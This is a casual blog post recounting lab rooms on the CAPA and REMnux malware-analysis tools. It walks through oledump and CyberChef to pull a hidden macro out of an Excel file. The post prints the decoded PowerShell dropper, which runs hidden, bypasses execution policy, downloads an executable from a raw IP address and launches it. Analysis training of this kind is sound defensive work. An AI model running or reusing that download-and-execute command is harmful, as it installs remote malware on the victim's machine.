Friday, Next we move on to the CAPA: The Basics module!
When I started this module I have no idea what CAPA was so rather than me trying and failing to explain it I will show the introduction blurp from this room below –
In this room we are tasked with analysing the results from the CAPA tool rather than running this via the host VM as it takes ages to try and load Powershell.
Objectives of this room are, Tool Overview: How CAPA Works, Dissecting CAPA Results Part 1: General Information, MITRE and MAEC, Dissecting CAPA Results Part 2: Malware Behavior Catalogue, Dissecting CAPA Results Part 3: Namespaces & Dissecting CAPA Results Part 4: Capability.
This room was.. alot, alot of fluff about CAPA & the Top Level Names Spaces, Rules, Detections and various other things. I don’t feel this was that useful to me personally but It’s always good to have an awareness of these types of tools and how the work.
Next we move on to the REMnux: Getting Started module!
So when I started this module/room I had no idea what REMnux was but apparently it is a VM that is used predominantly for security porfessionals that are dealing with incident response and malware, an explanation for the VM is shown below –
In the coming tasks we use a tool called oledump.py to conduct static analysis of potentially malcious excel file.
” Based on OleDump’s file analysis, a VBA script might be embedded in the document and found insidexl/vbaProject.bin. Therefore, oledump will assign this with an index of A, though this can sometimes differ. The A (index) +Numbers are called data streams. “
“Now, we should be aware of the data stream with the capital letter M. This means there is a Macro, and you might want to check out this data stream, 'VBA/ThisWorkbook'.”
Hexdump not very useful so lets convert this into something better.
“When we use this parameter, oledump will automatically decompress any compressed VBA macros it finds into a more readable format, making it easier to analyse the contents of the macros.”
As we can see there appears to be a Powershell script within this xls file which looks to be doing some bad stuff! We going to use our prior knowledge of CyberChef and remove the strings and see what comes out!
“powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace ‘tmp$’, ‘exe’ } �PassThru; Invoke-WebRequest -Uri “http://193.203.203.67/rt/Doc-3737122pdf.exe”” -OutFile $TempFile; Start-Process $TempFile;”
Next we proceed to use a tool called INetSim which is used for dynamic analysis to observe the behaviour of potentially malicious software within the network.
We start by pointing the local DNS address on the Remnux box back to our attack box in order to proceed with the task and then run the inetsim command.
Download the payload
Capture the flag
Interesting room and Interesting tools!
Until next time & don’t sleepwalk through life!
Selamat tinggal